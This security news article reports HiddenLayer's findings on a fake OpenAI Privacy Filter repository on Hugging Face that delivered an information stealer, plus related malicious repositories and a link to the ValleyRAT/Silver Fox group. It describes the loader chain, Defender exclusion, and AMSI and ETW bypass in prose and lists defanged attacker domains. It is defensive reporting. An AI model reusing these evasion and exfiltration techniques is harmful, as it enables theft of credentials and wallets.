A fake OpenAI repository on Hugging Face reached the number one trending position on the platform, collecting roughly 244,000 downloads and 667 likes within 18 hours before authorities pulled the plug.
The project, Open-OSS/privacy-filter, copied OpenAI’s legitimate Privacy Filter model almost word-for-word, including the full model description, to trick users into downloading it. Hugging Face has since disabled access to the malicious repository.
OpenAI released Privacy Filter in April 2026. The tool detects and strips personally identifiable information (PII) from unstructured text, and the company built it to help developers embed stronger privacy protections inside their applications. Criminals treated the launch as an opening.
OpenAI has faced other privacy-related challenges recently. Italy banned ChatGPT over privacy concerns, highlighting how governments are scrutinizing AI platforms for their data handling practices.
Hackers buried malware inside a fake model setup
The fraudulent repository directed users to clone it and run a batch script (“start.bat”) on Windows, or a Python script (“loader.py”) on Linux and macOS, to configure dependencies and start the model.
The Python script then quietly disabled SSL verification, decoded a Base64-encoded URL from a public JSON paste service called JSON Keeper, and used it to pull a command that it passed directly to PowerShell.
The HiddenLayer Research Team, which uncovered the scheme, noted that routing payloads through JSON Keeper gave the attackers the ability to swap out malicious files at any time without touching the repository itself.
PowerShell then fetched a batch script out of “api.eth-fastscan[.]org”, a remote server, and executed it. That batch script acted as a second-stage downloader.
It elevated its own privileges through a User Account Control (UAC) prompt, added itself to Microsoft Defender’s exclusion list, pulled the next payload from the same domain, and created a scheduled task to run the final executable.
According to HiddenLayer, the task served as a one-shot system-level launcher with no persistence across reboots, and the malware deleted itself two seconds after firing.
The final payload was a fully equipped information stealer. It captured screenshots, pulled data from wallets and extensions for virtual assets, Discord, system metadata, FileZilla configurations, seed phrases for digital wallets, and browsing history from both Chromium and Gecko-based browsers.
The stealer also scanned for debuggers, sandboxes, and virtual machines before disabling Windows Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW) to slip past behavioral detection. All stolen data left the machine in JSON format, heading to the domain “recargapopular[.]com.”
Researchers suspect the download and like counts were artificially inflated to manufacture the appearance of trust and push more users toward downloading the repository.
Six more infected repositories surface
HiddenLayer’s investigation turned up six additional Hugging Face repositories carrying the same Python loader, all published under an account named “anthfu.” The repositories used names mimicking popular AI models, including fake versions of DeepSeek, Qwen, and Gemma. According to HiddenLayer, the shared infrastructure across these repositories points to a coordinated supply chain operation targeting open-source platforms broadly.
The same server domain also delivered a separate Windows executable that connected to a command-and-control server researchers had previously tied to a malicious npm package called “trevlo.”
The trail leads back to ValleyRAT and Silver Fox
The trevlo package appeared on npm on April 4, 2026, under a user named “titaniumg” and accumulated more than 2,300 downloads before its removal. Researchers at Panther found that the package’s postinstall hook silently executed an obfuscated JavaScript loader.
That loader spawned a Base64-encoded PowerShell command, which fetched and ran a second-stage script from attacker-controlled infrastructure. The script then downloaded a Winos 4.0 stager binary, complete with hidden Zone Identifier removal, window execution, as well as process detachment.
Winos 4.0 is the same malware that security researchers track as ValleyRAT, a modular remote access trojan that analysts attribute exclusively to a Chinese threat group called Silver Fox. The group typically spreads ValleyRAT through phishing emails and SEO poisoning tactics. Using a Hugging Face repository as the entry point marks a new initial access method for this group.
Security researchers have become prime targets for these operations. Fake GitHub exploits have been delivering WebRAT malware specifically to researchers, suggesting threat actors see them as valuable entry points into larger networks.
According to HiddenLayer, the infrastructure overlap across these campaigns suggests they are likely connected and part of a wider operation focusing on open-source systems.
